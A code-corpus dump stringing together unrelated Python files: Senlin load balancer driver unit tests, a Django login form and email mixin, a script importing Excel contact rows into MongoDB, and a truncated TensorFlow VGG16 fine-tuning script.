self.oc.loadbalancer_create.return_value = lb_obj
self.nc.subnet_get.return_value = subnet_obj
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [False]
self.lb_driver.lb_delete = mock.Mock()
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating loadbalancer (%s).') % 'LB_ID'
self.assertEqual(msg, res)
self.oc.loadbalancer_create.assert_called_once_with(
'SUBNET_ID', self.vip['address'], self.vip['admin_state_up'])
self.lb_driver._wait_for_lb_ready.assert_called_once_with('LB_ID')
self.lb_driver.lb_delete.assert_called_once_with(
loadbalancer='LB_ID')
# Exception happens in subnet_get.
self.nc.subnet_get.side_effect = exception.InternalError(
code=500, message='GET FAILED')
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in getting subnet: GET FAILED.')
self.assertEqual(msg, res)
# Exception happens in loadbalancer_create.
self.nc.subnet_get.side_effect = None
self.oc.loadbalancer_create.side_effect = exception.InternalError(
code=500, message='CREATE FAILED')
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating loadbalancer: CREATE FAILED.')
self.assertEqual(msg, res)
@mock.patch.object(eventlet, 'sleep')
def test_lb_create_listener_creation_failed(self, mock_sleep):
lb_obj = mock.Mock()
listener_obj = mock.Mock()
lb_obj.id = 'LB_ID'
listener_obj.id = 'LISTENER_ID'
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, False]
self.oc.loadbalancer_create.return_value = lb_obj
self.oc.listener_create.return_value = listener_obj
self.nc.subnet_get.return_value = subnet_obj
self.lb_driver.lb_delete = mock.Mock()
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating listener (%s).') % 'LISTENER_ID'
self.assertEqual(msg, res)
self.oc.loadbalancer_create.assert_called_once_with(
'SUBNET_ID', self.vip['address'], self.vip['admin_state_up'])
self.oc.listener_create.assert_called_once_with(
'LB_ID', self.vip['protocol'], self.vip['protocol_port'],
self.vip['connection_limit'], self.vip['admin_state_up'])
self.lb_driver._wait_for_lb_ready.assert_called_with('LB_ID')
self.lb_driver.lb_delete.assert_called_once_with(
loadbalancer='LB_ID', listener='LISTENER_ID')
# Exception happens in listen_create
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, False]
self.oc.listener_create.side_effect = exception.InternalError(
code=500, message='CREATE FAILED')
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating lb listener: CREATE FAILED.')
self.assertEqual(msg, res)
def test_lb_create_pool_creation_failed(self):
lb_obj = mock.Mock()
listener_obj = mock.Mock()
pool_obj = mock.Mock()
lb_obj.id = 'LB_ID'
lb_obj.vip_address = '192.169.1.100'
listener_obj.id = 'LISTENER_ID'
pool_obj.id = 'POOL_ID'
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, True, False]
self.oc.loadbalancer_create.return_value = lb_obj
self.oc.listener_create.return_value = listener_obj
self.oc.pool_create.return_value = pool_obj
self.nc.subnet_get.return_value = subnet_obj
self.lb_driver.lb_delete = mock.Mock()
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating pool (%s).') % 'POOL_ID'
self.assertEqual(msg, res)
self.oc.loadbalancer_create.assert_called_once_with(
'SUBNET_ID', self.vip['address'], self.vip['admin_state_up'])
self.oc.listener_create.assert_called_once_with(
'LB_ID', self.vip['protocol'], self.vip['protocol_port'],
self.vip['connection_limit'], self.vip['admin_state_up'])
self.oc.pool_create.assert_called_once_with(
self.pool['lb_method'], 'LISTENER_ID', self.pool['protocol'],
self.pool['admin_state_up'])
self.lb_driver._wait_for_lb_ready.assert_called_with('LB_ID')
self.lb_driver.lb_delete.assert_called_once_with(
loadbalancer='LB_ID', listener='LISTENER_ID', pool='POOL_ID')
# Exception happens in pool_create
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, True, False]
self.oc.pool_create.side_effect = exception.InternalError(
code=500, message='CREATE FAILED')
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating lb pool: CREATE FAILED.')
self.assertEqual(msg, res)
def test_lb_create_healthmonitor_creation_failed(self):
lb_obj = mock.Mock()
listener_obj = mock.Mock()
pool_obj = mock.Mock()
hm_obj = mock.Mock()
lb_obj.id = 'LB_ID'
listener_obj.id = 'LISTENER_ID'
pool_obj.id = 'POOL_ID'
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
hm_obj.id = 'HEALTHMONITOR_ID'
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, True,
True, False]
self.oc.loadbalancer_create.return_value = lb_obj
self.oc.listener_create.return_value = listener_obj
self.oc.pool_create.return_value = pool_obj
self.oc.healthmonitor_create.return_value = hm_obj
self.nc.subnet_get.return_value = subnet_obj
self.lb_driver.lb_delete = mock.Mock()
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating health monitor (%s).') % 'HEALTHMONITOR_ID'
self.assertEqual(msg, res)
self.lb_driver.lb_delete.assert_called_once_with(
loadbalancer='LB_ID', listener='LISTENER_ID', pool='POOL_ID',
healthmonitor='HEALTHMONITOR_ID')
# Exception happens in healthmonitor_create
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, True, True]
self.oc.healthmonitor_create.side_effect = exception.InternalError(
code=500, message='CREATE FAILED')
status, res = self.lb_driver.lb_create(self.vip, self.pool, self.hm)
self.assertFalse(status)
msg = _('Failed in creating lb health monitor: CREATE FAILED.')
self.assertEqual(msg, res)
@mock.patch.object(neutron_v2, 'NeutronClient')
def test_lb_find(self, mock_neutron):
self.lb_driver.lb_find("FAKELB")
self.oc.loadbalancer_get.assert_called_once_with(
"FAKELB", False, False)
def test_lb_delete(self):
kwargs = {
'loadbalancer': 'LB_ID',
'listener': 'LISTENER_ID',
'pool': 'POOL_ID',
'healthmonitor': 'HM_ID'
}
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
status, res = self.lb_driver.lb_delete(**kwargs)
self.assertTrue(status)
self.assertEqual('LB deletion succeeded', res)
self.oc.loadbalancer_delete.assert_called_once_with('LB_ID')
self.oc.listener_delete.assert_called_once_with('LISTENER_ID')
self.oc.pool_delete.assert_called_once_with('POOL_ID')
self.oc.healthmonitor_delete.assert_called_once_with('HM_ID')
calls = [mock.call('LB_ID') for i in range(1, 4)]
self.lb_driver._wait_for_lb_ready.assert_has_calls(
calls, any_order=False)
def test_lb_healthmonitor_delete_internalerror(self):
kwargs = {
'loadbalancer': 'LB_ID',
'listener': 'LISTENER_ID',
'pool': 'POOL_ID',
'healthmonitor': 'HM_ID'
}
self.oc.healthmonitor_delete.side_effect = exception.InternalError(
code=500, message='DELETE FAILED')
status, res = self.lb_driver.lb_delete(**kwargs)
self.assertFalse(status)
msg = _('Failed in deleting healthmonitor: DELETE FAILED.')
self.assertEqual(msg, res)
def test_lb_pool_delete_internalerror(self):
kwargs = {
'loadbalancer': 'LB_ID',
'listener': 'LISTENER_ID',
'pool': 'POOL_ID',
'healthmonitor': 'HM_ID'
}
self.oc.pool_delete.side_effect = exception.InternalError(
code=500, message='DELETE FAILED')
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
status, res = self.lb_driver.lb_delete(**kwargs)
self.assertFalse(status)
msg = _('Failed in deleting lb pool: DELETE FAILED.')
self.assertEqual(msg, res)
def test_lb_listener_delete_internalerror(self):
kwargs = {
'loadbalancer': 'LB_ID',
'listener': 'LISTENER_ID',
'pool': 'POOL_ID',
'healthmonitor': 'HM_ID'
}
self.oc.listener_delete.side_effect = exception.InternalError(
code=500, message='DELETE FAILED')
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
status, res = self.lb_driver.lb_delete(**kwargs)
self.assertFalse(status)
msg = _('Failed in deleting listener: DELETE FAILED.')
self.assertEqual(msg, res)
def test_lb_delete_no_physical_object(self):
kwargs = {'loadbalancer': 'LB_ID'}
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
status, res = self.lb_driver.lb_delete(**kwargs)
self.assertTrue(status)
self.assertEqual('LB deletion succeeded', res)
self.oc.loadbalancer_delete.assert_called_once_with('LB_ID')
self.assertEqual(0, self.oc.healthmonitor_delete.call_count)
self.assertEqual(0, self.oc.pool_delete.call_count)
self.assertEqual(0, self.oc.listener_delete.call_count)
self.lb_driver._wait_for_lb_ready.assert_called_once_with(
'LB_ID', ignore_not_found=True)
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_succeeded(self, mock_get_current, mock_load):
fake_context = mock.Mock()
mock_get_current.return_value = fake_context
node = mock.Mock()
lb_id = 'LB_ID'
pool_id = 'POOL_ID'
port = '80'
subnet = 'subnet'
subnet_obj = mock.Mock(id='SUBNET_ID', network_id='NETWORK_ID')
subnet_obj.ip_version = '4'
subnet_obj.name = 'subnet'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network1'
member = mock.Mock(id='MEMBER_ID')
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr1_net1', 'version': '6'},
{'addr': 'ipaddr2_net1', 'version': '4'}],
'network2': [{'addr': 'ipaddr_net2', 'version': '4'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.return_value = network_obj
self.oc.pool_member_create.return_value = member
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
res = self.lb_driver.member_add(node, lb_id, pool_id, port, subnet)
self.assertEqual('MEMBER_ID', res)
self.nc.subnet_get.assert_called_once_with(subnet)
self.nc.network_get.assert_called_once_with('NETWORK_ID')
# Make sure the ip matches with subnet ip_version
self.oc.pool_member_create.assert_called_once_with(
pool_id, 'ipaddr2_net1', port, 'SUBNET_ID')
self.lb_driver._wait_for_lb_ready.assert_has_calls(
[mock.call('LB_ID'), mock.call('LB_ID')])
mock_load.assert_called_once_with(fake_context, db_node=node)
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_subnet_get_failed(self, mock_get_current):
self.nc.subnet_get.side_effect = exception.InternalError(
code=500, message="Can't find subnet")
res = self.lb_driver.member_add('node', 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_network_get_failed(self, mock_get_current):
subnet_obj = mock.Mock()
subnet_obj.name = 'subnet'
subnet_obj.id = 'SUBNET_ID'
subnet_obj.network_id = 'NETWORK_ID'
# Exception happens in network_get
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.side_effect = exception.InternalError(
code=500, message="Can't find NETWORK_ID")
res = self.lb_driver.member_add('node', 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_lb_unready_for_member_create(self, mock_get_current,
mock_load):
node = mock.Mock()
subnet_obj = mock.Mock(id='SUBNET_ID', network_id='NETWORK_ID')
subnet_obj.name = 'subnet'
subnet_obj.ip_version = '4'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network1'
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr_net1', 'version': '4'}],
'network2': [{'addr': 'ipaddr_net2', 'version': '4'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
# Exception happens in pool_member_create
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = False
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.return_value = network_obj
self.oc.pool_member_create.side_effect = exception.InternalError(
code=500, message="CREATE FAILED")
res = self.lb_driver.member_add(node, 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
self.lb_driver._wait_for_lb_ready.assert_called_once_with('LB_ID')
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_member_create_failed(self, mock_get_current,
mock_load):
node = mock.Mock()
subnet_obj = mock.Mock(id='SUBNET_ID', network_id='NETWORK_ID')
subnet_obj.name = 'subnet'
subnet_obj.ip_version = '4'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network1'
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr_net1', 'version': '4'}],
'network2': [{'addr': 'ipaddr_net2', 'version': '4'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
# Exception happens in pool_member_create
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.return_value = network_obj
self.oc.pool_member_create.side_effect = exception.InternalError(
code=500, message="CREATE FAILED")
res = self.lb_driver.member_add(node, 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_ip_version_match_failed(self, mock_get_current,
mock_load):
node = mock.Mock()
subnet_obj = mock.Mock(id='SUBNET_ID', network_id='NETWORK_ID')
subnet_obj.name = 'subnet'
subnet_obj.ip_version = '4'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network1'
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr_net1', 'version': '6'}],
'network2': [{'addr': 'ipaddr_net2', 'version': '6'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
# Node does not match with subnet ip_version
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.return_value = network_obj
self.oc.pool_member_create = mock.Mock(id='MEMBER_ID')
res = self.lb_driver.member_add(node, 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_wait_for_lb_timeout(self, mock_get_current, mock_load):
node = mock.Mock()
subnet_obj = mock.Mock(id='SUBNET_ID', network_id='NETWORK_ID')
subnet_obj.name = 'subnet'
subnet_obj.ip_version = '4'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network1'
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr_net1', 'version': '4'}],
'network2': [{'addr': 'ipaddr_net2', 'version': '4'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
# Wait for lb ready timeout after creating member
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, False]
self.nc.subnet_get.return_value = subnet_obj
self.nc.network_get.return_value = network_obj
res = self.lb_driver.member_add(node, 'LB_ID', 'POOL_ID', 80,
'subnet')
self.assertIsNone(res)
@mock.patch.object(nodem.Node, 'load')
@mock.patch.object(oslo_context, 'get_current')
def test_member_add_node_not_in_subnet(self, mock_get_current, mock_load):
node = mock.Mock()
lb_id = 'LB_ID'
pool_id = 'POOL_ID'
port = '80'
subnet = 'subnet'
network_obj = mock.Mock(id='NETWORK_ID')
network_obj.name = 'network3'
node_detail = {
'name': 'node-01',
'addresses': {
'network1': [{'addr': 'ipaddr_net1'}],
'network2': [{'addr': 'ipaddr_net2'}]
}
}
mock_load.return_value = node
node.get_details.return_value = node_detail
self.nc.network_get.return_value = network_obj
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
res = self.lb_driver.member_add(node, lb_id, pool_id, port, subnet)
self.assertIsNone(res)
def test_member_remove_succeeded(self):
lb_id = 'LB_ID'
pool_id = 'POOL_ID'
member_id = 'MEMBER_ID'
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
res = self.lb_driver.member_remove(lb_id, pool_id, member_id)
self.assertTrue(res)
self.oc.pool_member_delete.assert_called_once_with(pool_id, member_id)
self.lb_driver._wait_for_lb_ready.assert_has_calls(
[mock.call(lb_id), mock.call(lb_id, ignore_not_found=True)])
def test_member_remove_lb_unready_for_member_delete(self):
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = False
res = self.lb_driver.member_remove('LB_ID', 'POOL_ID', 'MEMBER_ID')
self.assertFalse(res)
self.lb_driver._wait_for_lb_ready.assert_called_once_with('LB_ID')
def test_member_remove_member_delete_failed(self):
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.return_value = True
self.oc.pool_member_delete.side_effect = exception.InternalError(
code=500, message='')
res = self.lb_driver.member_remove('LB_ID', 'POOL_ID', 'MEMBER_ID')
self.assertFalse(res)
self.oc.pool_member_delete.assert_called_once_with('POOL_ID',
'MEMBER_ID')
def test_member_remove_wait_for_lb_timeout(self):
self.lb_driver._wait_for_lb_ready = mock.Mock()
self.lb_driver._wait_for_lb_ready.side_effect = [True, False]
self.oc.pool_member_delete.side_effect = None
res = self.lb_driver.member_remove('LB_ID', 'POOL_ID', 'MEMBER_ID')
self.assertIsNone(res)
self.lb_driver._wait_for_lb_ready.assert_has_calls(
[mock.call('LB_ID'), mock.call('LB_ID', ignore_not_found=True)])
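# --- illustrative note (added; not part of the original test module) ---
# Pattern used throughout this class: patch NeutronClient/OctaviaClient in
# setUp, then drive _wait_for_lb_ready with a side_effect sequence such as
# [True, False] to simulate "operation accepted, but the LB never settled".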
| [
"Wayne [email protected]"
] | Wayne [email protected] |
00c5c1b70eb024b63457ed9b09528d8528502b80 | cf05dc6b31bb83b0b71cd357d7d19dfea7ad40a0 | /office_system/apps/users/forms.py | 2f956301bb4f9be16de57da66f79a02283317f08 | [] | no_license | peng-python/oa | 5df69a935b20b8200808133bf92d6757016cb9fa | bfc600a9c439866e1617f297007dc10fd8b86090 | refs/heads/master | 2020-03-17T20:21:54.927871 | 2018-05-18T05:15:28 | 2018-05-18T05:15:28 | 133,905,915 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | from django import forms
class LoginFrom(forms.Form):
username = forms.CharField(required=True)
password = forms.CharField(required=True, min_length=8) | [
"[email protected]"
] | |
ecad8ffd7a025b4ab4b4e0d41a5049f9c3ba1ac2 | 83d43c7b59c5cb5d7e5e793f76a26e588d52ffc2 | /eventex/subscriptions/mixins.py | 9687d96ac903e9388789a1d76f3d2caba68e4ce4 | [] | no_license | rodrigoddc/wttd | ec548a13fdc5f6d7330daa2ce53b9e3fe3549bc6 | fd5b4587cd3851668be8b85cf519f59c194a631c | refs/heads/master | 2023-03-29T11:02:33.791149 | 2021-03-28T18:05:19 | 2021-03-28T18:05:19 | 342,949,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | from django.conf import settings
from django.core import mail
from django.template.loader import render_to_string
from django.views.generic import CreateView
class EmailCreateMixin:
email_to = None
email_context_name = None
email_template_name = None
email_from = settings.DEFAULT_FROM_EMAIL
email_subject = ''
def send_mail(self):
# send subscription email
subject = self.email_subject
from_email = self.email_from
to_email = [self.get_email_to()]
template_name = self.get_email_template_name()
context = self.get_email_context_data()
body = render_to_string(template_name, context)
return mail.send_mail(subject=subject, message=body, from_email=from_email, recipient_list=to_email)
def get_email_context_data(self, **kwargs) -> dict:
context = dict(kwargs)
context.setdefault(self.get_email_context_name(), self.object)
return context
def get_email_context_name(self):
if self.email_context_name:
return self.email_context_name
return self.object._meta.model_name
def get_email_to(self):
if self.email_to:
return self.email_to
return self.object.email
def get_email_template_name(self):
""" When not provide, find email template by convention 'app_label'/'model_label'_email.txt """
if self.email_template_name:
return self.email_template_name
meta = self.object._meta
return f'{meta.app_label}/{meta.model_name}_email.txt'
class EmailCreateView(EmailCreateMixin, CreateView):
def form_valid(self, form):
response = super().form_valid(form)
self.send_mail()
return response
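# --- usage sketch (added; the Subscription model and its fields are assumptions) ---
# class SubscriptionCreate(EmailCreateView):
#     model = Subscription
#     fields = ['name', 'email']
#     email_subject = 'Subscription received'
# With email_template_name unset, the body template is resolved by the
# convention in get_email_template_name, e.g.
# 'subscriptions/subscription_email.txt'.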
| [
"[email protected]"
] | |
e52e408df819be554e75d2ac286768fecdfd6097 | 060e82b46016744deb7da7c940f97d0dea39d1b3 | /excel/定向分配/赵土良100445/ztl_python_script/To_mongo/ztl.py | 1fa3c0c96bb707e8b2bfcc393884c9065dcf378b | [] | no_license | yangwen1997/- | eb8c609d8af3f4493adf70d10df8cc5f561bcf60 | 197ae391ff1be36189ba003b025fd4802d703e00 | refs/heads/master | 2022-12-08T17:11:57.910664 | 2019-11-12T01:32:17 | 2019-11-12T01:32:17 | 160,466,240 | 0 | 1 | null | 2022-12-08T05:24:52 | 2018-12-05T05:34:19 | Python | UTF-8 | Python | false | false | 1,872 | py | '''
@author : yangwenlong
@file : ztl
@intro : save the 4320 records (赵土良) into MongoDB
@createtime : 2019/9/25
'''
import xlrd
import hashlib
from ztl_python_script.common import Enterprise_db,get_log
log = get_log()
# open the workbook (the Excel file) with xlrd
book = xlrd.open_workbook(r'D:\白名单\定向分配资源整理\excel\定向分配\赵土良100445\2016年8月4320条-赵土良.xlsx')
# call sheet_by_index(0) on the opened workbook to get the first sheet object
sheet=book.sheet_by_index(0)
def save(item):
item["_id"] = hashlib.md5(str(item["电话"]).encode('utf-8')).hexdigest()
Enterprise_db.save(item)
log.info("数据{}存入mongodb成功".format(item["电话"]))
# iterating over ncols would yield whole columns instead
# loop over the rows and read each one
for i in range(sheet.nrows):
if i == 0:
continue
else:
item = {}
item["公司"] = sheet.row_values(i)[0]
item["公司类型"] = sheet.row_values(i)[1]
item["负责人姓名"] = sheet.row_values(i)[2]
item["联络员姓名"] = sheet.row_values(i)[3]
phone= str(sheet.row_values(i)[4])
item["经营范围"] = sheet.row_values(i)[5]
item["地址"] = sheet.row_values(i)[6]
if ";" in phone:
phone_lt = phone.split(";")
for _ in phone_lt:
if _ and _ != '':
if "." in _:
item["电话"] = _.split(".")[0]
save(item)
else:
item["电话"] = _
save(item)
else:
if phone:
if "." in phone:
item["电话"] = phone.split(".")[0]
save(item)
else:
item["电话"] = phone
save(item)
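# --- illustrative note (added; not part of the original script) ---
# Using md5(phone) as the Mongo _id makes the import idempotent: re-running
# the script overwrites existing documents instead of inserting duplicates,
# because the same phone number always hashes to the same _id, e.g.
#   hashlib.md5('13800138000'.encode('utf-8')).hexdigest()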
| [
"[email protected]"
] | |
bbbd89f78abbeb8279500ab0d9bc9f97335753ed | 056f80bf04090be41300ab7693ae0ca888f43a79 | /hw1/04_pascal_vgg16_finetune.py | 5862c812a8edc46984a0f77fe90854828cfe3dcc | [] | no_license | ouyangjiahong/visual-learning | 6e223dc822e97417d296b19d7362f93cafc210bc | 36b7a68f6ea29ad459f8c33fd88e739e4c6f7cac | refs/heads/master | 2021-09-12T14:43:15.310856 | 2018-04-17T19:06:54 | 2018-04-17T19:06:54 | 121,583,147 | 1 | 7 | null | null | null | null | UTF-8 | Python | false | false | 17,683 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Imports
import sys
import numpy as np
import tensorflow as tf
import argparse
import os.path as osp
import scipy.misc as sci
from PIL import Image
from functools import partial
import matplotlib.pyplot as plt
from tensorflow.python.tools import inspect_checkpoint as chkp
from tensorflow.python import pywrap_tensorflow
import os
from eval import compute_map
# import model
tf.logging.set_verbosity(tf.logging.INFO)
CLASS_NAMES = [
'aeroplane',
'bicycle',
'bird',
'boat',
'bottle',
'bus',
'car',
'cat',
'chair',
'cow',
'diningtable',
'dog',
'horse',
'motorbike',
'person',
'pottedplant',
'sheep',
'sofa',
'train',
'tvmonitor',
]
BATCH_SIZE = 10
IMAGE_SIZE = 256
IMAGE_CROP_SIZE = 224
MODEL_PATH = "pascal_model_vgg16_finetune"
PRETRAIN_MODEL_PATH = "vgg_16.ckpt"
max_step = 4000
stride = 20
display = 10
# test_num = 10
def cnn_model_fn(features, labels, mode, num_classes=20):
# Build model
if mode == tf.estimator.ModeKeys.TRAIN:
input_layer = tf.reshape(features["x"], [-1, IMAGE_SIZE, IMAGE_SIZE, 3])
else:
input_layer = tf.reshape(features["x"], [-1, IMAGE_CROP_SIZE, IMAGE_CROP_SIZE, 3])
def data_augmentation(inputs):
for i in xrange(BATCH_SIZE):
output = tf.image.random_flip_left_right(inputs[i])
# output = tf.image.random_contrast(output, 0.95, 1.05)
# output += tf.random_normal([IMAGE_SIZE, IMAGE_SIZE, 3], 0, 0.1)
output = tf.random_crop(output, [IMAGE_CROP_SIZE, IMAGE_CROP_SIZE, 3])
output = tf.expand_dims(output, 0)
if i == 0:
outputs = output
else:
outputs = tf.concat([outputs, output], 0)
return outputs
# def center_crop(inputs, size):
# print(size)
# ratio = IMAGE_CROP_SIZE / float(IMAGE_SIZE)
# for i in xrange(size):
# output = tf.image.central_crop(inputs[i], ratio)
# output = tf.expand_dims(output, 0)
# if i == 0:
# outputs = output
# else:
# outputs = tf.concat([outputs, output], 0)
# return outputs
#data augmentation
if mode == tf.estimator.ModeKeys.TRAIN:
input_layer = data_augmentation(input_layer)
# load pretrained model
reader = pywrap_tensorflow.NewCheckpointReader(PRETRAIN_MODEL_PATH)
def vgg_conv(input, num_filters, k_init, b_init):
output = tf.layers.conv2d(
inputs=input,
filters=num_filters,
kernel_size=[3, 3],
strides=[1, 1],
padding="same",
activation=tf.nn.relu,
kernel_initializer=k_init,
bias_initializer=b_init)
return output
def vgg_maxpool(input):
output = tf.layers.max_pooling2d(inputs=input, pool_size=[2, 2], strides=2)
return output
def vgg_dense(input, num_out, k_init, b_init):
output = tf.layers.dense(
inputs=input, units=num_out,
activation=tf.nn.relu,
kernel_initializer=k_init,
bias_initializer=b_init)
return output
def vgg_dropout(input):
output = tf.layers.dropout(
inputs=input, rate=0.5, training=mode == tf.estimator.ModeKeys.TRAIN)
return output
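    # --- note (added): the fine-tuning mechanism used below ---
    # Rather than restoring variables by name, every layer is *initialized*
    # from the pretrained VGG16 checkpoint tensors read above, e.g.
    #   tf.constant_initializer(reader.get_tensor('vgg_16/conv1/conv1_1/weights'))
    # so the Estimator starts from those weights and trains them further.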
# define the network
# conv block 1
conv1_1 = vgg_conv(input_layer, 64,
tf.constant_initializer(reader.get_tensor('vgg_16/conv1/conv1_1/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv1/conv1_1/biases')))
conv1_2 = vgg_conv(conv1_1, 64,
tf.constant_initializer(reader.get_tensor('vgg_16/conv1/conv1_2/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv1/conv1_2/biases')))
pool1 = vgg_maxpool(conv1_2)
# conv block 2
conv2_1 = vgg_conv(pool1, 128,
tf.constant_initializer(reader.get_tensor('vgg_16/conv2/conv2_1/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv2/conv2_1/biases')))
conv2_2 = vgg_conv(conv2_1, 128,
tf.constant_initializer(reader.get_tensor('vgg_16/conv2/conv2_2/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv2/conv2_2/biases')))
pool2 = vgg_maxpool(conv2_2)
# conv block 3
conv3_1 = vgg_conv(pool2, 256,
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_1/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_1/biases')))
conv3_2 = vgg_conv(conv3_1, 256,
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_2/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_2/biases')))
conv3_3 = vgg_conv(conv3_2, 256,
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_3/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_3/biases')))
pool3 = vgg_maxpool(conv3_3)
# conv block 4
conv4_1 = vgg_conv(pool3, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_1/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_1/biases')))
conv4_2 = vgg_conv(conv4_1, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_2/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_2/biases')))
conv4_3 = vgg_conv(conv4_2, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_3/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_3/biases')))
pool4 = vgg_maxpool(conv4_3)
# conv block 5
conv5_1 = vgg_conv(pool4, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_1/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_1/biases')))
conv5_2 = vgg_conv(conv5_1, 512,
